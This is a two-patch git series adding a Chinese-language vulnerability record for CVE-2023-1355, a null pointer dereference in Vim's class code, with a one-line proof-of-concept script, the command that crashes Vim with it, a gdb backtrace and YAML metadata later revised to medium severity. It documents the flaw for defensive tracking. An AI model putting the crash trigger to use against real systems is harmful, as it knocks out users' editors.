From ff0e2e103154d81c199bf68023d15111a84fd2d9 Mon Sep 17 00:00:00 2001
From: bigdatahcchen
Date: Wed, 15 Mar 2023 16:51:49 +0800
Subject: [PATCH 1/2] =?UTF-8?q?=E9=99=88=E6=99=A8-=E6=B7=BB=E5=8A=A0?=
 =?UTF-8?q?=E4=BA=86vim=20CVE-2023-1355=20=E6=BC=8F=E6=B4=9E=E7=9A=84?=
 =?UTF-8?q?=E6=8F=8F=E8=BF=B0=E5=92=8CPOC?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/vim/2023/CVE-2023-1355/POC | 1 +
 cve/vim/2023/CVE-2023-1355/README.md | 146 +++++++++++++++++++++++++++
 cve/vim/2023/yaml/CVE-2023-1355.yaml | 21 ++++
 openkylin_list.yaml | 3 +-
 4 files changed, 170 insertions(+), 1 deletion(-)
 create mode 100644 cve/vim/2023/CVE-2023-1355/POC
 create mode 100644 cve/vim/2023/CVE-2023-1355/README.md
 create mode 100644 cve/vim/2023/yaml/CVE-2023-1355.yaml
diff --git a/cve/vim/2023/CVE-2023-1355/POC b/cve/vim/2023/CVE-2023-1355/POC
new file mode 100644
index 00000000..dc324c15
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1355/POC
@@ -0,0 +1 @@
+vim9@_ =null_class.a
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-1355/README.md b/cve/vim/2023/CVE-2023-1355/README.md
new file mode 100644
index 00000000..979aecc9
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1355/README.md
@@ -0,0 +1,146 @@
+# 描述
+问题:vim/vim 中 vim9class.c:1356 处的 class_object_index 存在空指针引用错误
+描述:在“vim9class.c:1356”中的class_object_index发生了空指针解引用,变量cl在“vim9class.c:1254”的class_object_index中为NULL,最后参考cl时也是NULL。
+漏洞类型:空指针解引用
+# 版本
+v9.0.1374版本
+```shell
+$ git log
+commit c727b19e9f1df36e44321d933334c7b4961daa54 (HEAD -> master, tag: v9.0.1374, origin/master, origin/HEAD)
+Author: Yegappan Lakshmanan
+Date: Fri Mar 3 12:26:15 2023 +0000
+
+ patch 9.0.1374: function for setting options not used consistently
+
+ Problem: Function for setting options not used consistently.
+ Solution: Use a function for 'encoding' and terminal options. (Yegappan
+ Lakshmanan, closes #12099)
+```
+
+# Proof of Concept
+
+```shell
+$ ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa!
+Segmentation fault (core dumped)
+```
+
+# Debug
+```shell
+gdb-peda$ r -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa!
+Starting program: /home/user/recentvim/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa!
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
+Use 'set logging enabled off'.
+
+Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
+Use 'set logging enabled on'.
+
+
+[----------------------------------registers-----------------------------------]
+RAX: 0x0
+RBX: 0x0
+RCX: 0x2
+RDX: 0x55555569ba29 (: endbr64)
+RSI: 0x0
+RDI: 0x555555969673 --> 0x210000000061 ('a')
+RBP: 0x7fffffffbc80 --> 0x7fffffffbd20 --> 0x7fffffffbda0 --> 0x7fffffffbe20 --> 0x7fffffffbeb0 --> 0x7fffffffbff0 (--> ...)
+RSP: 0x7fffffffb9f0 --> 0x100000000
+RIP: 0x5555558074d1 (: mov eax,DWORD PTR [rax+0x40])
+R8 : 0x1
+R9 : 0x55555596c710 ("E1004: White space required before and after '=' at \"\t=null_class.a\"")
+R10: 0x55555596ccc0 --> 0x570
+R11: 0xa ('\n')
+R12: 0x7fffffffddf8 --> 0x7fffffffe1fe ("/home/user/recentvim/vim/src/vim")
+R13: 0x55555588a9b7 (
: endbr64)
+R14: 0x555555906038 --> 0x55555558cac0 (<__do_global_dtors_aux>: endbr64)
+R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x555555554000 --> 0x10102464c457f
+EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+ 0x5555558074c1 : jmp 0x55555580750d
+ 0x5555558074c3 : add DWORD PTR [rbp-0x254],0x1
+ 0x5555558074ca : mov rax,QWORD PTR [rbp-0x238]
+=> 0x5555558074d1 : mov eax,DWORD PTR [rax+0x40]
+ 0x5555558074d4 : cmp DWORD PTR [rbp-0x254],eax
+ 0x5555558074da : jl 0x5555558073be
+ 0x5555558074e0 : mov rax,QWORD PTR [rbp-0x238]
+ 0x5555558074e7 : mov rax,QWORD PTR [rax]
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffffb9f0 --> 0x100000000
+0008| 0x7fffffffb9f8 --> 0x7fffffffc510 --> 0x1
+0016| 0x7fffffffba00 --> 0x7fffffffc500 --> 0x10
+0024| 0x7fffffffba08 --> 0x7fffffffc440 --> 0x555555969673 --> 0x210000000061 ('a')
+0032| 0x7fffffffba10 --> 0x0
+0040| 0x7fffffffba18 --> 0x0
+0048| 0x7fffffffba20 --> 0x0
+0056| 0x7fffffffba28 --> 0x0
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356
+1356 for (int i = 0; i < cl->class_class_member_count; ++i)
+gdb-peda$ bt
+#0 0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356
+#1 0x00005555555f3045 in handle_subscript (arg=0x7fffffffc440, name_start=0x0, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at eval.c:6934
+#2 0x00005555555ee0f3 in eval9 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:4310
+#3 0x00005555555ed2bb in eval8 (arg=0x7fffffffc440, rettv=0x7fffffffc500, 
evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3840
+#4 0x00005555555ecd0b in eval7 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3644
+#5 0x00005555555ec452 in eval6 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3423
+#6 0x00005555555ec114 in eval5 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3312
+#7 0x00005555555ebbe8 in eval4 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3163
+#8 0x00005555555eb6f7 in eval3 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3024
+#9 0x00005555555eb21f in eval2 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2898
+#10 0x00005555555eaad2 in eval1 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2744
+#11 0x00005555555ea85a in eval0_retarg (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510, retarg=0x0) at eval.c:2655
+#12 0x00005555555ea69b in eval0 (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510) at eval.c:2589
+#13 0x0000555555608779 in ex_let (eap=0x7fffffffc6a0) at evalvars.c:1149
+#14 0x0000555555607eb8 in ex_var (eap=0x7fffffffc6a0) at evalvars.c:960
+#15 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffc8d0, flags=0x7, cstack=0x7fffffffc9b0, fgetline=0x55555575fe37 , cookie=0x7fffffffd120) at ex_docmd.c:2580
+#16 0x000055555562009e in do_cmdline (cmdline=0x55555596c350 "vim9@_\t=null_class.a", fgetline=0x55555575fe37 , cookie=0x7fffffffd120, flags=0x7) at ex_docmd.c:993
+#17 0x000055555575eca8 in do_source_ext (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0, eap=0x0, clearvars=0x0) at scriptfile.c:1759
+#18 0x000055555575f3a3 in do_source (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0) at scriptfile.c:1905
+#19 0x000055555575de5f in cmd_source 
(fname=0x555555968893 "poc", eap=0x7fffffffd2d0) at scriptfile.c:1250
+#20 0x000055555575dea6 in ex_source (eap=0x7fffffffd2d0) at scriptfile.c:1276
+#21 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffd500, flags=0xb, cstack=0x7fffffffd5e0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
+#22 0x000055555562009e in do_cmdline (cmdline=0x555555968850 "so poc", fgetline=0x0, cookie=0x0, flags=0xb) at ex_docmd.c:993
+#23 0x000055555561f535 in do_cmdline_cmd (cmd=0x555555968850 "so poc") at ex_docmd.c:587
+#24 0x000055555588e6da in exe_commands (parmp=0x555555953800 ) at main.c:3146
+#25 0x000055555588b50f in vim_main2 () at main.c:782
+#26 0x000055555588ae7c in main (argc=0xf, argv=0x7fffffffddf8) at main.c:433
+#27 0x00007ffff7c29d90 in __libc_start_call_main (main=main@entry=0x55555588a9b7
, argc=argc@entry=0xf, argv=argv@entry=0x7fffffffddf8) at ../sysdeps/nptl/libc_start_call_main.h:58
+#28 0x00007ffff7c29e40 in __libc_start_main_impl (main=0x55555588a9b7
, argc=0xf, argv=0x7fffffffddf8, init=, fini=, rtld_fini=,
+ stack_end=0x7fffffffdde8) at ../csu/libc-start.c:392
+#29 0x000055555558ca45 in _start ()
+gdb-peda$ p cl
+$1 = (class_T *) 0x0
+gdb-peda$ p *(typval_T *) rettv
+$2 = {
+ v_type = VAR_CLASS,
+ v_lock = 0x0,
+ vval = {
+ v_number = 0x0,
+ v_float = 0,
+ v_string = 0x0,
+ v_list = 0x0,
+ v_dict = 0x0,
+ v_partial = 0x0,
+ v_job = 0x0,
+ v_channel = 0x0,
+ v_blob = 0x0,
+ v_instr = 0x0,
+ v_class = 0x0,
+ v_object = 0x0
+ }
+}
+
+```
+
+# POC
+
+[POC](https://drive.google.com/file/d/1E4Pq8-iuhQ9aY_i0d-ibamYHvR5XmIsr/view?usp=share_link)
+
+# 影响
+
+导致代码执行使得程序异常终止或崩溃
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-1355.yaml b/cve/vim/2023/yaml/CVE-2023-1355.yaml
new file mode 100644
index 00000000..99af252e
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-1355.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-1355
+source: https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ vim/vim 中 vim9class.c:1356 处的 class_object_index 存在空指针引用错误
+ scope-of-influence:
+ vim v9.0.1374
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1355
+ - https://ubuntu.com/security/CVE-2023-1355
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-1355
+ cwe-id: CWE-476
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023, 空指针解引用
+ 
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a8b7367..c5e652f6 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -76,6 +76,7 @@ cve:
 - CVE-2022-2264
 - CVE-2022-2598
 - CVE-2023-0433
+ - CVE-2023-1355
 openssl:
 - CVE-2022-1292
 - CVE-2022-2274
@@ -105,4 +106,4 @@ kve:
 kylin-display-switch:
 - KVE-2022-0206
 kylin-activation:
- - KVE-2022-0231
\ No newline at end of file
+ - KVE-2022-0231
-- 
Gitee
From 92f340ba14238d644537fc7105a97f6aebb4b698 Mon Sep 17 00:00:00 2001
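Review bot: In the new cve/vim/2023/yaml/CVE-2023-1355.yaml, `cnvd-id: None` and `kve-id: None` are plain YAML scalars, so a loader reads them as the string "None" rather than a null value; anything that consumes these records and tests for a missing id with a null check will see these entries as carrying an id. If a null is intended, `cnvd-id: ~` and `kve-id: ~` (or an empty value) express it; if "None" is the convention the repository's other records use, leave it. Likewise `tags: cve2023, 空指针解引用` is a single comma-containing string, where `tags: [cve2023, 空指针解引用]` would give a sequence. The file also ends in a whitespace-only line with no trailing newline, which the second patch in this series (severity, score and reference changes) leaves in place.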
From: chenchen
Date: Sun, 26 Mar 2023 09:05:59 +0000
Subject: [PATCH 2/2] update cve/vim/2023/yaml/CVE-2023-1355.yaml.
Signed-off-by: chenchen
---
 cve/vim/2023/yaml/CVE-2023-1355.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cve/vim/2023/yaml/CVE-2023-1355.yaml b/cve/vim/2023/yaml/CVE-2023-1355.yaml
index 99af252e..5b1b5284 100644
--- a/cve/vim/2023/yaml/CVE-2023-1355.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-1355.yaml
@@ -2,17 +2,17 @@ id: CVE-2023-1355
 source: https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9/
 info:
 name: Vim是一款基于UNIX平台的编辑器。
- severity: high
+ severity: medium
 description: |
 vim/vim 中 vim9class.c:1356 处的 class_object_index 存在空指针引用错误
 scope-of-influence:
 vim v9.0.1374
 reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1355
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1355
 - https://ubuntu.com/security/CVE-2023-1355
 classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
- cvss-score: 7.8
+ cvss-score: 5.5
 cve-id: CVE-2023-1355
 cwe-id: CWE-476
 cnvd-id: None
-- 
Gitee